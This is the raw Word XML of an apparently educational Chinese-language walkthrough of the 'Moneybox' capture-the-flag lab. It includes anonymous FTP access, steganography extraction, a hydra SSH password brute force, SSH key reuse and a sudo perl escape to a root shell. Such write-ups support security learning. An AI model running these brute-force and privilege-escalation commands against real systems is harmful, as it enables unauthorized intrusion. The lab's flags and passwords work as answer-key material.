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3531870" cy="4092575"/>
            <wp:effectExtent l="0" t="0" r="3810" b="6985"/>
            <wp:docPr id="9" name="圖片 9" descr="Moneybo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Moneybox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TW"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4636135" cy="1406525"/>
            <wp:effectExtent l="0" t="0" r="12065" b="10795"/>
            <wp:docPr id="8" name="圖片 8" descr="Moneybo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Moneybox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有開</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>21,22,80 port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0340" cy="1422400"/>
            <wp:effectExtent l="0" t="0" r="12700" b="10160"/>
            <wp:docPr id="7" name="圖片 7" descr="Moneybo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Moneybox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ftp anonymous@192.168.241.230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嘗試用anonymous登入ftp，發現</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>trytofind.jpg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get trytofind.jpg，是圖片檔，可能有隱碼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3193415" cy="3240405"/>
            <wp:effectExtent l="0" t="0" r="6985" b="5715"/>
            <wp:docPr id="6" name="圖片 6" descr="Moneybo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Moneybox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dirsearch -u 192.168.241.230</w:t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發現blogs dir</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="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4491990" cy="4762500"/>
            <wp:effectExtent l="0" t="0" r="3810" b="7620"/>
            <wp:docPr id="5" name="圖片 5" descr="Moneybox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Moneybox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Page source藏有提示S3cr3t-T3xt dir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3114675" cy="4023360"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="4" name="圖片 4" descr="Moneybox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Moneybox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再到S3cr3t-T3xt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t xml:space="preserve"> dir看page source發現提示secret key 3xtr4ctd4t4，可能是圖片隱碼密碼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3040" cy="1558925"/>
            <wp:effectExtent l="0" t="0" r="0" b="10795"/>
            <wp:docPr id="3" name="圖片 3" descr="Moneybo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Moneybox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steghide --extract -sf tritofind.jpg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解出隱碼內容成data.txt，提到有個人叫r</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>enu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2405" cy="1621155"/>
            <wp:effectExtent l="0" t="0" r="635" b="9525"/>
            <wp:docPr id="2" name="圖片 2" descr="Moneybo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Moneybox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hydra -l renu -P /usr/share/wordlists/rockyou.txt ssh://192.168.241.230:22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用hydra爆破username為renu的ssh密碼，結果為987654321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3040" cy="2428240"/>
            <wp:effectExtent l="0" t="0" r="0" b="10160"/>
            <wp:docPr id="1" name="圖片 1" descr="Moneybox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Moneybox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 xml:space="preserve">ssh </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US" w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>renu@192.168.241.230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取得local.txt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8595" cy="2752725"/>
            <wp:effectExtent l="0" t="0" r="4445" b="5715"/>
            <wp:docPr id="12" name="圖片 12" descr="Moneybox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Moneybox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用linepas.sh掃漏洞，發現history</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t xml:space="preserve"> file內有特別敘述，重複提到user lily，並且有2個重要敘述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ssh-keygen -t rsa</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US" w:eastAsia="zh-TW"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t xml:space="preserve">ssh-copy-id </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US" w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>lily@192.168.43.80</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US" w:eastAsia="zh-TW"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US" w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>第一行目的是建立rsa key</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US" w:eastAsia="zh-TW"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US" w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>第二行則用ssh-copy-id將public key傳至lily下的authorized key目錄</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US" w:eastAsia="zh-TW"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US" w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>如此一來則能用renu的rsa key連線到lily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3675" cy="1833245"/>
            <wp:effectExtent l="0" t="0" r="14605" b="10795"/>
            <wp:docPr id="11" name="圖片 11" descr="Moneybox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Moneybox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cd .ssh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 xml:space="preserve">ssh -i id_rsa </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US" w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>lily@192.168.241.230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成功連線至lily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9230" cy="983615"/>
            <wp:effectExtent l="0" t="0" r="3810" b="6985"/>
            <wp:docPr id="10" name="圖片 10" descr="Moneybox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Moneybox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sudo -l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發現perl binary</w:t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 w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US" w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>https://gtfobins.github.io/gtfobins/perl/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google發現有描述漏洞使用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sudo perl -e 'exec "/bin/sh";'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取得root shell以及proot.txt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D71189"/>
    <w:rsid w:val="0A4C2822"/>
    <w:rsid w:val="0B327DAD"/>
    <w:rsid w:val="0D727E75"/>
    <w:rsid w:val="0F7948D3"/>
    <w:rsid w:val="10681509"/>
    <w:rsid w:val="16E133BF"/>
    <w:rsid w:val="18B66FD5"/>
    <w:rsid w:val="1C416368"/>
    <w:rsid w:val="21CB55CB"/>
    <w:rsid w:val="2B601B3C"/>
    <w:rsid w:val="34825C7D"/>
    <w:rsid w:val="35AC2362"/>
    <w:rsid w:val="44FD2685"/>
    <w:rsid w:val="46914AAB"/>
    <w:rsid w:val="4E805A72"/>
    <w:rsid w:val="573B5246"/>
    <w:rsid w:val="578C7081"/>
    <w:rsid w:val="623772CC"/>
    <w:rsid w:val="62EE473E"/>
    <w:rsid w:val="73A64271"/>
    <w:rsid w:val="786054A2"/>
    <w:rsid w:val="7AD85C93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ACER</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-06-06T04:16:43Z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